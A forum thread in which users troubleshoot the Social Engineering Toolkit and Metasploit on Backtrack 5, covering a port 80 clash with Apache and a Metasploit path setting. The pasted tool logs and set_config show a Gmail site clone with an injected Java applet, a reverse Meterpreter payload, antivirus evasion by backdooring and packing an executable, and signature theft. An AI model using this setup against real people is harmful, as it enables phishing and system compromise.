SET Error on port 80

This topic contains 17 replies, has 4 voices, and was last updated by  hell_razor 7 years ago.

  • Author
    Posts
  • #7661
     skorpinok 
    Participant

    Hello
              When i run social engineering tool kit i get this error  :Something is running on port 80. Seeing if it’s a stale SET process.
    i used Java Applet Attack Method-Site – site cloner. i restarted SET & still the problem persists,please suggest me how to solve this ?

    Thank you

    set:payloads> PORT of the listener [443]:
    [*] Done, moving the payload into the action.
    [-] Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload…
    [*] Stager turned off, prepping direct download payload…
    [*] Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.
    [!] ERROR:Something is running on port 80. Seeing if it’s a stale SET process…
    [!] If you want to use Apache, edit the config/set_config
    [!] Exit whatever is listening and restart SET

  • #47792
     cd1zz 
    Participant

    If you’re using Backtrack, you probably have apache set to start automatically, which is probably where the conflict is.

    netstat -antp will tell you what the problem is.

  • #47793
     skorpinok 
    Participant

    @cd1zz wrote:

    If you’re using Backtrack, you probably have apache set to start automatically, which is probably where the conflict is.

    netstat -antp will tell you what the problem is.

    I’m using backtrack 5r2, a netstat -antp reveals me this,

    root@bt:~# netstat -antp

    Active Internet connections (servers and established)

    Proto Recv-Q Send-Q Local Address          Foreign Address        State      PID/Program name

    tcp        0      0 0.0.0.0:80              0.0.0.0:*              LISTEN      1127/apache2   

    tcp        0      0 127.0.0.1:5432          0.0.0.0:*              LISTEN      786/postgres   

    tcp6      0      0 ::1:5432                :::*                    LISTEN      786/postgres   

  • #47794
     Data_Raid 
    Participant

    @skorpinok wrote:

    @cd1zz wrote:

    If you’re using Backtrack, you probably have apache set to start automatically, which is probably where the conflict is.

    netstat -antp will tell you what the problem is.

    I’m using backtrack 5r2, a netstat -antp reveals me this,

    root@bt:~# netstat -antp

    Active Internet connections (servers and established)

    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name

    tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1127/apache2    

    tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      786/postgres    

    tcp6       0      0 ::1:5432                :::*                    LISTEN      786/postgres    

    Apache is running, I highlighted in bold, that’s why SET doesn’t load.
    Try stopping Apache and see if that helps: “apache2 stop”  or “/etc/init.d/apache2 stop”

  • #47795
     cd1zz 
    Participant

    Or, just configure SET to use apache in set_config:

    # USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
    # THE ATTACK VECTOR
    APACHE_SERVER=ON

  • #47796
     skorpinok 
    Participant

    @cd1zz wrote:

    Or, just configure SET to use apache in set_config:

    # USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
    # THE ATTACK VECTOR
    APACHE_SERVER=ON

    Thanks now it works without any problem, did exactly as you said, however , in the mean while iam faced with another problem, metasploit wont load in SET (waited for minutes )when i use java applet attack method,any idea what could be causing this ?

    info…

    –] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox
    Apache web server is currently in use for performance.

    [*] Moving payload into cloned website.
    [*] The site has been moved. SET Web Server is now listening..
    [-] Launching MSF Listener…
    [-] This may take a few to load MSF…

    Press [return] when finished.

    Thank you

  • #47797
     cd1zz 
    Participant

    I’m not sure I see where the error is. Double check the set_config that it is pointed to the correct msf directory.

  • #47798
     skorpinok 
    Participant

    @cd1zz wrote:

    I’m not sure I see where the error is. Double check the set_config that it is pointed to the correct msf directory.

    Well in set_config previously was default /pentest/exploits/framework3, which i later changed to cd /opt/metasploit/msf3/ after this still same problem, then i located msfconsole through terminal

    root@bt:~# locate msfconsole
    /opt/metasploit/app/msfconsole
    /opt/metasploit/apps/pro/msf3/msfconsole
    /opt/metasploit/apps/pro/msf3/test/functional/framework/msfconsole_spec.rb
    /opt/metasploit/msf3/msfconsole
    /opt/metasploit/msf3/.svn/prop-base/msfconsole.svn-base
    /opt/metasploit/msf3/.svn/text-base/msfconsole.svn-base
    /opt/metasploit/msf3/documentation/msfconsole_rc_ruby_example.rc
    /opt/metasploit/msf3/documentation/.svn/text-base/msfconsole_rc_ruby_example.rc.svn-base
    /opt/metasploit/msf3/external/source/armitage/resources/msfconsole.style
    /opt/metasploit/msf3/external/source/armitage/resources/.svn/text-base/msfconsole.style.svn-base
    /opt/metasploit/msf3/test/functional/framework/msfconsole_spec.rb
    /opt/metasploit/msf3/test/functional/framework/.svn/text-base/msfconsole_spec.rb.svn-base
    /pentest/exploits/framework2/msfconsole
    /pentest/exploits/framework2/docs/QUICKSTART.msfconsole
    /usr/local/bin/msfconsole
    /usr/share/applications/backtrack-metasploit-msfconsole.desktop

    then once again i configure in SET DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
    METASPLOIT_PATH= /pentest/exploits/framework2/msfconsole.

    still not working anymore, where could be the problem, i use Backtrack 5R2, metasploit v4.4.0-dev. any ideas ?

  • #47799
     cd1zz 
    Participant

    Dont point it to the msfconsole binary, point it to the path. It should be

    /pentest/exploits/framework3

  • #47800
     skorpinok 
    Participant

    @cd1zz wrote:

    Dont point it to the msfconsole binary, point it to the path. It should be

    /pentest/exploits/framework3

    ok i changed it to
    /pentest/exploits/framework3

    its same thing again msf just wont load at all..

    here is the brief info.. i go to …

      Website Attack Vectors -> Java Applet Attack Method–> Site Cloner
    Are you using NAT/Port Forwarding [yes|no]: no

    IP address for the reverse connection:192.168.56.101 (backtrack ip)

    [*] Cloning the website: http://www.gmail.com
    [*] This could take a little bit…
    [*] Injecting Java Applet attack into the newly cloned website.
    [*] Filename obfuscation complete. Payload name is: 84hPykFDDtYIJKx
    [*] Malicious java applet website prepped for deployment

    What payload do you want to generate: Windows Reverse_TCP Meterpreter

    Payload : Backdoored Executable (BEST)

    set:payloads> PORT of the listener [443] ( i press enter default)

    [*] Generating x64-based powershell injection code…
    [*] Generating x86-based powershell injection code…
    [*] Finished generating shellcode powershell injection attack and is encoded to bypass execution restriction policys…
    [-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds…
    [*] Backdoor completed successfully. Payload is now hidden within a legit executable.
    [*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
    [-] Packing the executable and obfuscating PE file randomly, one moment.
    [*] Digital Signature Stealing is ON, hijacking a legit digital certificate
    [*] Generating OSX payloads through Metasploit…
    [*] Generating Linux payloads through Metasploit…
    [*] Apache appears to be running, moving files into Apache’s home

    ***************************************************
    Web Server Launched. Welcome to the SET Web Attack.
    ***************************************************

    Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox
    Apache web server is currently in use for performance.

    [*] Moving payload into cloned website.
    [*] The site has been moved. SET Web Server is now listening..
    [-] Launching MSF Listener…
    [-] This may take a few to load MSF…

  • #47801
     cd1zz 
    Participant

    How long are you waiting?

    Does metasploit start separately, on it’s own?

  • #47802
     hell_razor 
    Participant

    It should be /pentest/exploits/framework (they dropped the 3) or
    /opt/metasploit/msf3

  • #47803
     cd1zz 
    Participant

    Yep, hell_razor is right. I was going off memory. Just checked and they did drop the 3. However, I thought SET threw an error when it used the wrong dir.

  • #47804
     skorpinok 
    Participant

    @cd1zz wrote:

    Yep, hell_razor is right. I was going off memory. Just checked and they did drop the 3. However, I thought SET threw an error when it used the wrong dir.

    sorry bro.. i did what mr. razor told tried each one of them  /pentest/exploits/framework & /opt/metasploit/msf3, its out of luck, its same again, updated metasploit & SET too before this. well i’ll try to reinstall Backtrack 5R2 O.S… guess this would work..

    here is the brief info regarding my set_config..

    DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
    METASPLOIT_PATH= /opt/metasploit/msf3

    METASPLOIT_DATABASE=postgresql
    HOW MANY TIMES SET SHOULD ENCODE A PAYLOAD IF YOU ARE USING STANDARD METASPLO
    ENCOUNT=4
    AUTO_MIGRATE=OFF
    BACKDOOR_EXECUTION=ON
    METASPLOIT_IFRAME_PORT=8080
    DSNIFF=OFF
    AUTO_DETECT=OFF
    SENDMAIL=ON
    EMAIL_PROVIDER=GMAIL
    WEBATTACK_EMAIL=ON
    APACHE_SERVER=ON
    SELF_SIGNED_APPLET=ON
    WEBATTACK_SSL=OFF
    OSX_REVERSE_PORT=8080
    AUTOMATIC_LISTENER=ON
    SET_SHELL_STAGER=OFF
    METASPLOIT_MODE=ON

  • #47805
     cd1zz 
    Participant

    I would just grab a fresh copy of both and start there.

  • #47806
     skorpinok 
    Participant

    @cd1zz wrote:

    I would just grab a fresh copy of both and start there.

    now i see that metasploit works on Spear-Phishing Attack Vectors,but not in java applet attack method..well said .. better if i would reinstall O.S itself…

  • #47807
     cd1zz 
    Participant

    sledgehammer!

  • #47808
     hell_razor 
    Participant

    Yeah, something is definitely going bonkers…you can always do an apt-get remove set –purge and then apt-get install set and set-update…you can do the same to metasploit, but it may be more cantankerous.

You must be logged in to reply to this topic.

Copyright ©2019 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?